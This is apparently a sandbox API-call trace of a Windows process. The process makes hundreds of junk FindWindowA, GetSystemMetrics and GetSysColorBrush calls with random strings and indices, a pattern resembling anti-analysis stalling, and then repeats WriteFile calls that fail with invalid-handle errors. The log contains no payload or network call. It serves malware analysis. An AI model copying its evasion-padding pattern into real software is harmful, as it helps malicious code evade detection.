[0309.149] GetSystemMetrics (nIndex=66936644) returned 0 [0309.149] FindWindowA (lpClassName="bgCfXRpG3MhovsHlDDfNBk04qbH0tZLyBVHbisMt6qCwy9PGxvwZ1JuWoM9X4NZWJYxsZ9Qgf", lpWindowName="KEb2pCsOn5GFuW3zpPaatNle7p95lzBUpchx2wk43s3iOUK4rfFjv3Us1mBYSBCQ31F1lGKI9") returned 0x0 [0309.149] FindWindowA (lpClassName="zzFM95lYrKuhGtvDbbTnTXY0IPR6J6tkabhSBntU04vWNdWmhiuV9NdQuv4QuLYUNXTKvo4AL", lpWindowName="ts0AwRZ4EpPkqOcLlzzXczpS6aVBepdJqH42KmHtja2TkwCAG1K39IYp6ur6G8stIJScNq13E") returned 0x0 [0309.149] GetConsoleWindow () returned 0x0 [0309.149] GetSystemMetrics (nIndex=57565375) returned 0 [0309.149] GetSysColorBrush (nIndex=94594339) returned 0x0 [0309.149] GetSystemMetrics (nIndex=24294842) returned 0 [0309.149] FindWindowA (lpClassName="M1U2MqpOhePXsFR2NvMRKGE0YaewOPCNVY3jDzzZXts2uoDrmNXiE36ZUykPf3sjJZDGji7Fg", lpWindowName="5NcZ0B4DJkmqZFYbxMFIAgunaLgvecOOxmDnwyMx0NMr1SJvFUSCSekuxVgOY8vO9wANr0BbN") returned 0x0 [0309.150] FindWindowA (lpClassName="rmoks31jrc1Szv4cLLpf6P0v7NoH9kVPVdTdjD5iGHqyyaR27KICp3LH9UkWDuCNX05LBVtVc", lpWindowName="7RiGWBoMqWklaFFpC9vJErOxAxGbdU9ceiEQ5MzOciSqn3cq49lIiw7LjdOwUzmwigtJKIFtn") returned 0x0 [0309.150] GetCurrentProcessId () returned 0xf94 [0309.150] GetSystemMetrics (nIndex=82242675) returned 0 [0309.150] GetSysColorBrush (nIndex=33783396) returned 0x0 [0309.150] GetSystemMetrics (nIndex=43838753) returned 0 [0309.150] FindWindowA (lpClassName="dQOn1SHDLML0tdlmyoXz4mwzW0ux2reztbQMd9tGdw448nVZhR4SrqDE13ydlvbxBPeKIuAuf", lpWindowName="SbDXKIIzihD0tLkN4zhKrqQ5XvZ5wKMrJnHhMDgoaPcC1Af6txVcSlcxpiXKCy4Lx0HYIQlqX") returned 0x0 [0309.150] FindWindowA (lpClassName="7s4AmNMnAgeFMi0XxQ4NJOvA8GRb33ukYm25ifkQHX2RFyiU5Vc8uo0RYoN8qKOkCGdiqJoNF", lpWindowName="nJBYau9pNGADgZBXNb7zwKkKQtGTObJFGbnJ4058OUejld62G2aF0gH331dpRzJUY0rHp2DJY") returned 0x0 [0309.150] GetLastError () returned 0x57 [0309.151] GetSystemMetrics (nIndex=85487226) returned 0 [0309.151] GetSysColorBrush (nIndex=67442297) returned 0x0 [0309.151] GetSystemMetrics (nIndex=82982468) returned 0 [0309.151] FindWindowA (lpClassName="eK8FiPwiGrlntAfAGa34PFrs8lBYIdfKbFmpafCDNKSmHg4yDLBeWpihN0tQfHserg3PIBWGN", lpWindowName="3mqIzIJ0W4tpNHUR860ewMrJ4FxiaQDKL894NutdD2H2JxI2qDuEgRiSQSlWY5SCk8T859i09") returned 0x0 [0309.151] FindWindowA (lpClassName="frPqHJZYaMBNK1iXZL4ANsS21uD9Mtp2VzxQIMRmH0r1Hy55zODtwAsoIZ8jdX2i5l40Sp2bK", lpWindowName="oSJDXYSCxiw6jM3PhtOg3asEoXv2rqhTqLgPF83SNTgwiXD3sIsKcS8sLizAOrDitBLcba7X5") returned 0x0 [0309.151] GetCurrentProcessId () returned 0xf94 [0309.151] GetSystemMetrics (nIndex=54595727) returned 0 [0309.151] GetSysColorBrush (nIndex=62573262) returned 0x0 [0309.151] GetSystemMetrics (nIndex=34669272) returned 0 [0309.151] FindWindowA (lpClassName="FEDLmaugyBHFbwf84kTg47KCo8o7trurQyyRx0Ciup3vKIFFFeKznRscLXNP3YD6EIcDlGt9J", lpWindowName="bmMcA1KT2IREtuGahBX4rRNU2ccBjZ9kEqVDZHS1EaJt43KRBuPM0rNZxOTjaADvE5hxc9XUB") returned 0x0 [0309.151] FindWindowA (lpClassName="3wVG58W1dXVQ7T2jiSnzFCCwJkzVvCZbeeS5vffY8pji5rXgWipVLkwZQjx7RvgslSnHiiQGr", lpWindowName="EewwNhG4uEAcypCT1pUMsEaKrh3alz9FHZGaFIWhett4BtZ5AaKvmfGNJxxbarDKFWUCIgBn2") returned 0x0 [0309.151] GetCurrentProcessId () returned 0xf94 [0309.151] GetSystemMetrics (nIndex=74792598) returned 0 [0309.151] GetSysColorBrush (nIndex=92368724) returned 0x0 [0309.151] GetSystemMetrics (nIndex=54389227) returned 0 [0309.151] FindWindowA (lpClassName="wxZnBRdySNu1uojQxu0MOAV8oBgeLkSEWKonGoCLJywdUnEpjGZG8mtBqPyTmio5PT4GvVPqn", lpWindowName="ZcSvindNkGxHlY4wNqaN77FCgUkEDDzrKXqOfF7smiAEyT2kOtSTo66Lrcr5yjOQco3Vj0aPi") returned 0x0 [0309.152] FindWindowA (lpClassName="0EG3ERUqSlBTBs8OlHwtJVUdOCxPgrwVuBlKIcHIWv6asuC9lnyBdWmwBnScbIFVUAq20Qxw2", lpWindowName="1rMPs31BtvN2ai3f5y0zWbT3j3jcJ2Fbua51hlVSQI8vJuWzCsLvVIfLUzW0vCLxEZ2nOkmhg") returned 0x0 [0309.152] GetConsoleWindow () returned 0x0 [0309.152] GetSystemMetrics (nIndex=29852526) returned 0 [0309.152] GetSysColorBrush (nIndex=39778297) returned 0x0 [0309.152] GetSystemMetrics (nIndex=22587728) returned 0 [0309.152] FindWindowA (lpClassName="uC0ZsWhuaWQjBlmhoP6fb3v9QPCqionZadzbJGeg4xNHyuMe8MgBgXmyQCnKZcv4wr457Yqu5", lpWindowName="o91Fr8lHugbosFMc4qmj80di0rRdeuJB9ObSaxdANP0Ya0fOJONduMErxhqivOP0tYe9HoR27") returned 0x0 [0309.152] FindWindowA (lpClassName="WpbHFGm4Fgic7P9ZyGpUGU3woxS8nXNHaO88h22ADBjH3LRgs1dKNVcESA31z9CpVS0z60E28", lpWindowName="Y50XGY9nyB17twsevu29aHSfT4CWQQpXjsW9DoxWhYQK4Hpo1EvgIsU5c5jagz9xzofxz3MCR") returned 0x0 [0309.152] GetCurrentThreadId () returned 0xbe0 [0309.152] GetSystemMetrics (nIndex=88329233) returned 0 [0309.152] GetSysColorBrush (nIndex=48663282) returned 0x0 [0309.152] GetSystemMetrics (nIndex=86568356) returned 0 [0309.152] FindWindowA (lpClassName="zE2bs7qtdvD94WYRVk0kRczPMm4e4rNPNAk9bSFKI9pt3LZ5YRfvQ9gnsqN6mNV3aP4ktSerT", lpWindowName="jpAzky1D66hCashmznna85uR8ymUZ3urrVVnN8vd8O8hkht0Cwl0wU33goE6Hlt2roonWiIDw") returned 0x0 [0309.152] FindWindowA (lpClassName="zho1G4DncXlyXRWzNtCpFtj9W9WpZj075BhEo6wCiskehrFomCxULrZBqpYjgss2Tr6J5bRRD", lpWindowName="UlCwzD0488aQayRgmAaIdtYHAUeZCt1EpYU91WcjwjzR1jxdVcEQtpCAwc1qHrQFkUZKwz7Fi") returned 0x0 [0309.153] GetLastError () returned 0x57 [0309.153] GetSystemMetrics (nIndex=86458289) returned 0 [0309.153] GetSysColorBrush (nIndex=95749879) returned 0x0 [0309.153] GetSystemMetrics (nIndex=39572828) returned 0 [0309.153] FindWindowA (lpClassName="3P9pCWdywwXIo9OrDuypUJ1dCyaIg6hsPFOtIqkyHdTGVUX74KD45m4KYmD5KzXxcJ303WXnA", lpWindowName="Fi7HIsKs7GrZAHA5MekyquGBu76J1kqJ3kNoDfICtZckIZM40tjg4AQebW1cLLTCnDBuU2O8Q") returned 0x0 [0309.153] FindWindowA (lpClassName="hzapzqpkV40D7kCpFtLhauCGW8YtzZAPqa8u6cUYZc0BhWRmm7x4RbGpd7fJM0FWyDKA0Fiqt", lpWindowName="jKgUskQgabTVnlEPtYAgwPwRz3yaBEK2LISUjNovhkGgCAjcKJBzPlDNOhw8tF1iMXOkyuvSK") returned 0x0 [0309.153] GetLastError () returned 0x57 [0309.153] GetSystemMetrics (nIndex=33976334) returned 0 [0309.153] GetSysColorBrush (nIndex=45753786) returned 0x0 [0309.153] GetSystemMetrics (nIndex=87864884) returned 0 [0309.153] FindWindowA (lpClassName="ybtua93nII59rKim7xanAZAFA6RBMnMGhVNrqGUKFmhtS2fzqtgqueyVzMdVhByXpOlmoeyZK", lpWindowName="OUImBT7HVVfcORx9b0Ky8FnP0vATc6zuBphInkYkjwJEWzKyxMQBaHkw2lWzLPpS5yFU2Hrm1") returned 0x0 [0309.153] FindWindowA (lpClassName="i7gvhaLtwrK48ORYeUjCAU8LMNhobVXB9IjcaGN5YivQvwRX5ZaA6L3ZzXkUmtUEd0wEoNfL0", lpWindowName="8traZtf673JBaLz8RKrYYflqRSUTPLHr1pdgnzZAHl7SZM8XD8W5a8ZwKjQJnvTOx2GaB8FYy") returned 0x0 [0309.153] GetCurrentThreadId () returned 0xbe0 [0309.153] GetSystemMetrics (nIndex=34424848) returned 0 [0309.153] GetSysColorBrush (nIndex=49562425) returned 0x0 [0309.153] GetSystemMetrics (nIndex=57374747) returned 0 [0309.153] FindWindowA (lpClassName="3AtNq51XLTXIxNi2pPT8mDUUjnC3jpV4UCok05SD6s58hfpohlI7WVYfjwnuRkvudHcIbDK4r", lpWindowName="D3ocCsKPlIsvVaYFXrYDc3HsSXlTbh49koLaq7zG6ctef8TA3iAuVSxUhTXhYDSWCsbSFNOF7") returned 0x0 [0309.154] FindWindowA (lpClassName="SnlQy54Z3R5VZFhSMYbwdROW00ggvyP21OPXtq5aQOLvrgsyMXI3cLP38nDtYJ6IzKXuwzOiP", lpWindowName="a59W1paYLaqC9V3dRHvragmD4UZhnJDnd2NtE1cigJ0GSMdZyBb1T93lX9W5DrUyNzLMdvrxg") returned 0x0 [0309.154] GetConsoleWindow () returned 0x0 [0309.154] GetSystemMetrics (nIndex=55448796) returned 0 [0309.154] GetSysColorBrush (nIndex=44388864) returned 0x0 [0309.154] GetSystemMetrics (nIndex=83872455) returned 0 [0309.154] FindWindowA (lpClassName="j9KvFBUHHHetaPMDuRMIBFVtQpkgcQYZeFJKF50YaLZixHgjpOHzc46SEcOVh1XKT3oQ9YdZP", lpWindowName="XXuoKA09nMxYyMBSSKPheBGKjQZbsCknHuocV1oWgZadbjwCnJoUK8COBc32Qu4z5FLhGsGn8") returned 0x0 [0309.154] FindWindowA (lpClassName="5ZqeEVXCvEUUlT3sTbOxZkeLZhKGGhWeapCdVK7EoDu8UUDGuwR81NN9rqaocOP3WYV9Ki3wF", lpWindowName="derhzwyBYU7R4lyHVh67dl5DjxtvlSCjjgTPxV8cd40uZAVTvhxz6NUhwKdcfmCRkPwDOMj8k") returned 0x0 [0309.154] GetCurrentThreadId () returned 0xbe0 [0309.154] GetSystemMetrics (nIndex=56683777) returned 0 [0309.154] GetSysColorBrush (nIndex=45688793) returned 0x0 [0309.154] GetSystemMetrics (nIndex=82694686) returned 0 [0309.154] FindWindowA (lpClassName="dLydirwybxV6zwy6R6ts9dtHUaoYVUGA7KdNXy5KSQqfXNpAGmAMewKEmeWUWI7npasuAFTK6", lpWindowName="3KXS4RXWvLMfJVaWHfJ3naAH6GZ9oRqUdHo29NiVx6BXU8yhQlpKE3FZK76OjdeixQ2GeiN3Q") returned 0x0 [0309.154] FindWindowA (lpClassName="5hMccLdbDmfQXljZBCSdfcA0FJHIB5cocht8txX3J037MprpamEe6trwuVM9NpssUTIxUgpet", lpWindowName="VHsArm4VnqxZKnjbVOeNC2HzU8yvLlWPNKfYvxfFlfR9ptanGWINImNMtzQtdVN8gi6gFIfQl") returned 0x0 [0309.154] GetLastError () returned 0x57 [0309.154] GetSystemMetrics (nIndex=77724362) returned 0 [0309.155] GetSysColorBrush (nIndex=73824472) returned 0x0 [0309.155] GetSystemMetrics (nIndex=76866597) returned 0 [0309.155] FindWindowA (lpClassName="1zDtR8GCLdYgZ2STy3uYN3P6alzwuxhoqgzAOOJyN5vssfCL3IMPGEbYBHOIsXIBoyxuKZNI5", lpWindowName="5oEG3bVY3RoyAeV1kQ2eKw66OteEWkLRiCkH8gYuBVh4kq7ipnhP14n69DsTAjaYbcSaNGETd") returned 0x0 [0309.176] FindWindowA (lpClassName="3aV52CPt788BSuzJegUAyVE5t7hvR5QnhV6bWY5oxyIRM9EZRMJz7ZGtPIT29VwIbLAjgSDOv", lpWindowName="RwQbSjfhoDAYX4soDlBAenfgCmD5nFoiFcxbVHuCXv4lGWRvv72xsbFhljQEW89th3JtMN3jy") returned 0x0 [0309.176] GetCurrentThreadId () returned 0xbe0 [0309.176] GetSystemMetrics (nIndex=42424849) returned 0 [0309.176] GetSysColorBrush (nIndex=54836666) returned 0x0 [0309.176] GetSystemMetrics (nIndex=43538924) returned 0 [0309.176] FindWindowA (lpClassName="USJZPdR3dI32aVj1j2MyL0PSnk2V9Ehyr5eByYJLmfavnl9PDrPvvr4A4mXb6RBE3GnzS4Nll", lpWindowName="TtZdNAAX1itxMM2qIRyNutbNXarHNhCwHLeQWDd8SmEZizyd0ojfJIdoHSi50NK4dXIuo6G7y") returned 0x0 [0309.176] FindWindowA (lpClassName="iaJOLGPCyJs8tCJ4ppre3iVHxj4DeRCd9ynRpxPDT7Q0PqGKl7tctrn9wbysHDMHZNoXBKk0R", lpWindowName="w94Lj7TuuqdJwc5QnPiXDL2shjBVOAclJME2e8hQs5c74A24lNk0dyeGfk69yrhWTZOb2n33f") returned 0x0 [0309.176] GetLastError () returned 0x57 [0309.176] GetSystemMetrics (nIndex=74382223) returned 0 [0309.176] GetSysColorBrush (nIndex=83972329) returned 0x0 [0309.176] GetSystemMetrics (nIndex=33283827) returned 0 [0309.176] FindWindowA (lpClassName="kzRuWZHHpszdA8AgCUpWJNNH99rHoqMiPGvcT3HQaDEIBZmX62p2PVpS9U6c0EoTIfuYE1Gz9", lpWindowName="Ry7w0KYo53f8g3JBHfu8Wo9wANAhjVEiN6CSJbD5iW7aw2M8GRrFzkPN77j3VolyEu55G7amE") returned 0x0 [0309.177] FindWindowA (lpClassName="bFnlp8nlNiuc1l2fs9ScfbuZLt4gAUsGUPuJ2PodJPa4PBsMQzgutWsiqk9vprFlc7a9bZQre", lpWindowName="LeCHw71QH1AqZhKqTmxITVvJjUyw8IoQZ5SEU5eJKeQg0mbhkZLfLn7siT865wyTN4YgTV3X6") returned 0x0 [0309.177] GetCurrentProcessId () returned 0xf94 [0309.177] GetSystemMetrics (nIndex=23749549) returned 0 [0309.177] GetSysColorBrush (nIndex=98362756) returned 0x0 [0309.177] GetSystemMetrics (nIndex=86732625) returned 0 [0309.177] FindWindowA (lpClassName="RofOQINge5pmyol0MB2oVMw8L3Nqd8sTmJG9VoxgBqTf8TbycFd1FvJHHSYLNNOKMqAQqHcNi", lpWindowName="cRU4EFXiDekJ3TdFcJUxBGesVbP8zkXSU9CePswDhQs8iDGo3rqPPhhmNrIHYdagMBstm5tpH") returned 0x0 [0309.177] FindWindowA (lpClassName="XLxPSKaDY8OyVSLCLx9qzWX7Y39FM1Zfsx5SvcnmoggorM1U51RmUM5tJt34cNSDREdiozwEK", lpWindowName="RUmj4YsuFJHCGRQOUls7H21KXyymfdbnvu5s1AtEEcxJIghMnitAT5n5IELkPvJiVfT9d0Kws") returned 0x0 [0309.177] GetCurrentThreadId () returned 0xbe0 [0309.177] GetSystemMetrics (nIndex=48224273) returned 0 [0309.177] GetSysColorBrush (nIndex=59843296) returned 0x0 [0309.337] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1000) returned 0x5b3e90 [0309.527] GetLastError () returned 0x57 [0309.565] SetLastError (dwErrCode=0x57) [0309.594] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.595] GetLastError () returned 0x6 [0309.595] GetLastError () returned 0x6 [0309.595] SetLastError (dwErrCode=0x6) [0309.595] GetLastError () returned 0x6 [0309.595] SetLastError (dwErrCode=0x6) [0309.689] GetLastError () returned 0x6 [0309.689] SetLastError (dwErrCode=0x6) [0309.689] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.689] GetLastError () returned 0x6 [0309.689] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.690] GetLastError () returned 0x6 [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.690] GetLastError () returned 0x6 [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.690] GetLastError () returned 0x6 [0309.690] SetLastError (dwErrCode=0x6) [0309.691] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.691] GetLastError () returned 0x6 [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.691] GetLastError () returned 0x6 [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.691] GetLastError () returned 0x6 [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.691] SetLastError (dwErrCode=0x6) [0309.691] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.692] GetLastError () returned 0x6 [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.692] GetLastError () returned 0x6 [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.692] GetLastError () returned 0x6 [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.692] GetLastError () returned 0x6 [0309.692] SetLastError (dwErrCode=0x6) [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.693] GetLastError () returned 0x6 [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.693] GetLastError () returned 0x6 [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.693] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.693] GetLastError () returned 0x6 [0309.693] GetLastError () returned 0x6 [0309.693] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.694] GetLastError () returned 0x6 [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.694] GetLastError () returned 0x6 [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.694] SetLastError (dwErrCode=0x6) [0309.694] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.695] GetLastError () returned 0x6 [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.695] GetLastError () returned 0x6 [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] GetLastError () returned 0x6 [0309.695] SetLastError (dwErrCode=0x6) [0309.695] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.695] GetLastError () returned 0x6 [0309.695] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.696] GetLastError () returned 0x6 [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.696] GetLastError () returned 0x6 [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.696] GetLastError () returned 0x6 [0309.696] SetLastError (dwErrCode=0x6) [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.697] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.697] GetLastError () returned 0x6 [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.697] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.697] GetLastError () returned 0x6 [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.697] GetLastError () returned 0x6 [0309.697] SetLastError (dwErrCode=0x6) [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.698] GetLastError () returned 0x6 [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.698] GetLastError () returned 0x6 [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.698] GetLastError () returned 0x6 [0309.698] SetLastError (dwErrCode=0x6) [0309.699] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.699] GetLastError () returned 0x6 [0309.699] GetLastError () returned 0x6 [0309.699] SetLastError (dwErrCode=0x6) [0309.699] GetLastError () returned 0x6 [0309.699] SetLastError (dwErrCode=0x6) [0309.699] GetLastError () returned 0x6 [0309.699] SetLastError (dwErrCode=0x6) [0309.699] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.699] GetLastError () returned 0x6 [0309.699] GetLastError () returned 0x6 